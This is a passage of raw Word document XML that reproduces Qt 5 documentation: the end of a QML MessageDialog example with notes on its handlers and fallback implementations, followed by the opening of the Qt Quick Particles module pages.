                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>"May I have your attention please"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    text: </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>"It's so cool that you are using Qt Quick."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    onAccepted: {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">        console.log(</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>"And of course you could only agree."</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="007945B6"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Qt</w:t>
            </w:r>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.quit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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0437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC"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23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">.onCompleted: visible = </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="3A405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Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>There are se</w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>veral possible handlers depending on which standardButtons the dialog has</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and the </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ButtonRole</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of each. For </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>example</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, the onRejected handler will be called if the user presses a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Cancel, Close or Abort button.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73CF4" w:rsidRPr="00B73CF4" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">A MessageDialog window is </w:t>
            </w:r>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>automatically transient</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> for its parent window. So whether you declare the dialog inside an Item or inside a Window, the dialog will appear centered over the window containing the item, or ove</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r the Window that you declared.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00C16B41" w:rsidRDefault="00B73CF4" w:rsidP="00B73CF4">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000437DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The implementation</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73CF4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of MessageDialog will be a platform message dialog if possible. If that isn't possible, then it will try to instantiate a QMessageBox. If that also isn't possible, then it will fall back to a QML implementation, DefaultMessageDialog.qml. In that case you can customize the appearance by editing this file. DefaultMessageDialog.qml contains a Rectangle to hold the dialog's contents, because certain embedded systems do not support multiple top-level windows. When the dialog becomes visible, it will automatically be wrapped in a Window if possible, or simply reparented on top of the main window if there can only be one window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FD51DE" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1821" w:history="1">
        <w:r w:rsidR="000437DC" w:rsidRPr="005A37A4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="240" w:line="276" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1420" w:name="_Toc483000835"/>
      <w:bookmarkStart w:id="1421" w:name="_Toc483003828"/>
      <w:bookmarkStart w:id="1422" w:name="_Toc483604181"/>
      <w:bookmarkStart w:id="1423" w:name="_Toc483605401"/>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Particles QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1420"/>
      <w:bookmarkEnd w:id="1421"/>
      <w:bookmarkEnd w:id="1422"/>
      <w:bookmarkEnd w:id="1423"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">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This QML module contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>particle system</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Qt Quick. To use these types, </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1822" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Particles </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">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0437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For a simple overview of how the system can be used, see</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1823" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the Qt Quick Particle System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">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0437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For details on the performance characteristics see</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1824" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Particle System Performance</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRDefault="000437DC" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1825" w:history="1">
        <w:r w:rsidR="000437DC" w:rsidRPr="005A37A4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-effects-particles.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1424" w:name="_Toc483000836"/>
      <w:bookmarkStart w:id="1425" w:name="_Toc483003829"/>
      <w:bookmarkStart w:id="1426" w:name="_Toc483604182"/>
      <w:bookmarkStart w:id="1427" w:name="_Toc483605402"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the Qt Quick Particle System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1424"/>
      <w:bookmarkEnd w:id="1425"/>
      <w:bookmarkEnd w:id="1426"/>
      <w:bookmarkEnd w:id="1427"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Documentation for all Particle System types can be found on the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1826" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick.Particles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
